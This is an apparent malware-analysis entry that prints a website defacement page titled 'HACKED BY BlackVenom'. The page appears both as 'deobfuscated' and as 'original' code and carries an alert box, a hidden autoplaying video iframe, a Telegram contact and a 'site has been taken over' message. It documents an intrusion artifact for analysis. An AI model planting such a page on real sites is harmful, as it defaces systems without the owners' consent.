PHP Malware Analysis

Back to list

Tags

URLs
https://c.tenor.com/JZFx5PtapzcAAAAM/pepe-hacker-pog.gif
https://c.tenor.com/JZFx5PtapzcAAAAM/pepe-hacker-pog.gif
https://fonts.googleapis.com/css2?family=Kalam&display=swap
https://www.youtube.com/embed/LApS9G22cIU?rel=0&autoplay=1
https://c.tenor.com/JZFx5PtapzcAAAAM/pepe-hacker-pog.gif
https://www.youtube.com/embed/oc3Cq89P97Y?start=9
Title
HACKED BY BlackVenom

Deobfuscated code

<html>
<head>
</script>
<script>alert("Opps : Hacked By BlackVenom");</script>
    <title>HACKED BY BlackVenom</title>
	<meta name='theme-color' content='black'/>
	<meta name="author" content="Cryptonic HaXori"/>
	<meta name="copyright" content="2k20"/>
	<meta property="og:description" content=""/>	
	<meta property="og:image" content="https://c.tenor.com/JZFx5PtapzcAAAAM/pepe-hacker-pog.gif"/>
    <link rel="og:shortcut icon" href="https://c.tenor.com/JZFx5PtapzcAAAAM/pepe-hacker-pog.gif"/>
    <link href="https://fonts.googleapis.com/css2?family=Kalam&display=swap" rel="stylesheet" type="text/css">
	<table width=100% height=100%>
	<td align="center">
<style>
	h1 {
            background: black;
            color: white;
            font-family: "Courier New";
            text-align: center;      
            text-shadow :0 0 5px #fff, 0 0 10px #fff, 0 0 20px #00ffed, 0 0 30px #00ffed, 0 0 40px #00ffed, 0 0 15px #00ffed, 0 0 15px #00ffed; 
            opacity: 150%;
       }
     img { 
            border-radius: 90%;
            opacity: 40%;
        } 
</style>
<style type=text/css >
    .blink_text {
    -webkit-animation-name: blinker;
    -webkit-animation-duration: 2s;
    -webkit-animation-timing-function: linear;
    -webkit-animation-iteration-count: infinite;
    
    -moz-animation-name: blinker;
    -moz-animation-duration: 2s;
    -moz-animation-timing-function: linear;
    -moz-animation-iteration-count: infinite;
    
     animation-name: blinker;
     animation-duration: 2s;
     animation-timing-function: linear;
     animation-iteration-count: infinite;
    
     color: white;
    }
    @-moz-keyframes blinker { 
     0% { opacity: 5.0;
     }
     50% { opacity: 0.0;
     }
     100% { opacity: 5.0;
     }
     }
    @-webkit-keyframes blinker { 
     0% { opacity: 5.0;
     }
     50% { opacity: 0.0;
     }
     100% { opacity: 5.0;
     }
     }
    @keyframes blinker { 
     0% { opacity: 5.0;
     }
     50% { opacity: 0.0;
     }
     100% { opacity: 5.0;
     }
     }
     
     #copy {
         color: lime;
         font-weight: bold;
         font-family: Kelly Slab;
     }
     #copy a {
         color: white;
     }
     #copy a:hover {
         color: blue;
     }
    
    body{
    font-family: Kelly Slab;
    background-color: black;
    color:white;
    }
    #content tr:hover{
    background-color: blue;
    text-shadow:0px 0px 10px #fff;
    }
    #content .first{
    background-color: #15CFF4;
    }
    table{
    border: 1px #000000;
    }
    .s_tb{
    border:1px silver;
    }
    a{
    color:white;
    font-size: 19px;
    text-decoration:none;
    }
    a:hover{
    color:green;
    text-shadow:0px 0px 10px #ffffff;
    }
    input,select,textarea{
    border: 2px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
    }
    h2{
    font-family:Kelly Slab;
    font-size:25px;
    color:white;
    }
    h3{
    font-size:35px;
    }
    h4{
    font-size:15px;
    font-family:Kelly Slab;
    color:white;
    }
    </style>
    <style type="text/css">
        .lagu{
             background:transparent;
            border:2px solid silver;
            font-family:Share Tech Mono;
            color:white;
            font-size:18x;
            font-weight:bold;
            padding:3px 29px;
            text-decoration:none;
            text-shadow:0px 0px 20px #15CFF4;;
          }
		   .lagu1{
             background:transparent;
            border:2px solid silver;
            font-family:Share Tech Mono;
            color:white;
            font-size:18x;
            font-weight:bold;
            padding:3px 29px;
            text-decoration:none;
            text-shadow:0px 0px 20px #15CFF4;;
          }
        </style>
        <script> function play(){ var audio = document.getElementById('lagu'); audio.play(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } 
        </script>
    <script type="text/javascript" src="../cdn.rawgit.com/FicriPebriyana/efek/0a935a6c/efek salju.js"></script>
    <script type="text/javascript" src="../cdn.rawgit.com/FicriPebriyana/efek/0a935a6c/efek salju.js"></script>
    <script type="text/javascript" src="../cdn.rawgit.com/FicriPebriyana/efek/0a935a6c/efek salju.js"></script>   
</head>
<body bgcolor="black">
     </center>

<iframe width="0" height="0" src="https://www.youtube.com/embed/LApS9G22cIU?rel=0&autoplay=1" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe>
    <center>
        
       
            <img style="border:10px solid #0404B4;" src="https://c.tenor.com/JZFx5PtapzcAAAAM/pepe-hacker-pog.gif"/><br>
            <br></p><h1><p class="blink_text" style="font-size: 45px;font-family:Kalam;">Hacked By ./BlackVenom</font><br></p><h1>
			
			<button class="lagu" onclick="play();liat();"><font face="Kalam" size="5" color="white" > Telegram Me : @Black_Venom1 </font></button><audio id="lagu" 
	        <br>
			<button class="lagu1" onclick="play();liat();"><font face="Kalam" size="5" color="white" >  The site has been taken over , Protecting your site is weak </font></button><audio id="lagu1" 
	        <br>
			<iframe width="560" height="315" src="https://www.youtube.com/embed/oc3Cq89P97Y?start=9" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
                </html>


Original code

<html>
<head>
</script>
<script>alert("Opps : Hacked By BlackVenom");</script>
    <title>HACKED BY BlackVenom</title>
	<meta name='theme-color' content='black'/>
	<meta name="author" content="Cryptonic HaXori"/>
	<meta name="copyright" content="2k20"/>
	<meta property="og:description" content=""/>	
	<meta property="og:image" content="https://c.tenor.com/JZFx5PtapzcAAAAM/pepe-hacker-pog.gif"/>
    <link rel="og:shortcut icon" href="https://c.tenor.com/JZFx5PtapzcAAAAM/pepe-hacker-pog.gif"/>
    <link href="https://fonts.googleapis.com/css2?family=Kalam&display=swap" rel="stylesheet" type="text/css">
	<table width=100% height=100%>
	<td align="center">
<style>
	h1 {
            background: black;
            color: white;
            font-family: "Courier New";
            text-align: center;      
            text-shadow :0 0 5px #fff, 0 0 10px #fff, 0 0 20px #00ffed, 0 0 30px #00ffed, 0 0 40px #00ffed, 0 0 15px #00ffed, 0 0 15px #00ffed; 
            opacity: 150%;
       }
     img { 
            border-radius: 90%;
            opacity: 40%;
        } 
</style>
<style type=text/css >
    .blink_text {
    -webkit-animation-name: blinker;
    -webkit-animation-duration: 2s;
    -webkit-animation-timing-function: linear;
    -webkit-animation-iteration-count: infinite;
    
    -moz-animation-name: blinker;
    -moz-animation-duration: 2s;
    -moz-animation-timing-function: linear;
    -moz-animation-iteration-count: infinite;
    
     animation-name: blinker;
     animation-duration: 2s;
     animation-timing-function: linear;
     animation-iteration-count: infinite;
    
     color: white;
    }
    @-moz-keyframes blinker { 
     0% { opacity: 5.0;
     }
     50% { opacity: 0.0;
     }
     100% { opacity: 5.0;
     }
     }
    @-webkit-keyframes blinker { 
     0% { opacity: 5.0;
     }
     50% { opacity: 0.0;
     }
     100% { opacity: 5.0;
     }
     }
    @keyframes blinker { 
     0% { opacity: 5.0;
     }
     50% { opacity: 0.0;
     }
     100% { opacity: 5.0;
     }
     }
     
     #copy {
         color: lime;
         font-weight: bold;
         font-family: Kelly Slab;
     }
     #copy a {
         color: white;
     }
     #copy a:hover {
         color: blue;
     }
    
    body{
    font-family: Kelly Slab;
    background-color: black;
    color:white;
    }
    #content tr:hover{
    background-color: blue;
    text-shadow:0px 0px 10px #fff;
    }
    #content .first{
    background-color: #15CFF4;
    }
    table{
    border: 1px #000000;
    }
    .s_tb{
    border:1px silver;
    }
    a{
    color:white;
    font-size: 19px;
    text-decoration:none;
    }
    a:hover{
    color:green;
    text-shadow:0px 0px 10px #ffffff;
    }
    input,select,textarea{
    border: 2px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
    }
    h2{
    font-family:Kelly Slab;
    font-size:25px;
    color:white;
    }
    h3{
    font-size:35px;
    }
    h4{
    font-size:15px;
    font-family:Kelly Slab;
    color:white;
    }
    </style>
    <style type="text/css">
        .lagu{
             background:transparent;
            border:2px solid silver;
            font-family:Share Tech Mono;
            color:white;
            font-size:18x;
            font-weight:bold;
            padding:3px 29px;
            text-decoration:none;
            text-shadow:0px 0px 20px #15CFF4;;
          }
		   .lagu1{
             background:transparent;
            border:2px solid silver;
            font-family:Share Tech Mono;
            color:white;
            font-size:18x;
            font-weight:bold;
            padding:3px 29px;
            text-decoration:none;
            text-shadow:0px 0px 20px #15CFF4;;
          }
        </style>
        <script> function play(){ var audio = document.getElementById('lagu'); audio.play(); } function liat(){ document.getElementById('galiat').style.visibility='visible'; } 
        </script>
    <script type="text/javascript" src="../cdn.rawgit.com/FicriPebriyana/efek/0a935a6c/efek salju.js"></script>
    <script type="text/javascript" src="../cdn.rawgit.com/FicriPebriyana/efek/0a935a6c/efek salju.js"></script>
    <script type="text/javascript" src="../cdn.rawgit.com/FicriPebriyana/efek/0a935a6c/efek salju.js"></script>   
</head>
<body bgcolor="black">
     </center>

<iframe width="0" height="0" src="https://www.youtube.com/embed/LApS9G22cIU?rel=0&autoplay=1" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe>
    <center>
        
       
            <img style="border:10px solid #0404B4;" src="https://c.tenor.com/JZFx5PtapzcAAAAM/pepe-hacker-pog.gif"/><br>
            <br></p><h1><p class="blink_text" style="font-size: 45px;font-family:Kalam;">Hacked By ./BlackVenom</font><br></p><h1>
			
			<button class="lagu" onclick="play();liat();"><font face="Kalam" size="5" color="white" > Telegram Me : @Black_Venom1 </font></button><audio id="lagu" 
	        <br>
			<button class="lagu1" onclick="play();liat();"><font face="Kalam" size="5" color="white" >  The site has been taken over , Protecting your site is weak </font></button><audio id="lagu1" 
	        <br>
			<iframe width="560" height="315" src="https://www.youtube.com/embed/oc3Cq89P97Y?start=9" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
                </html>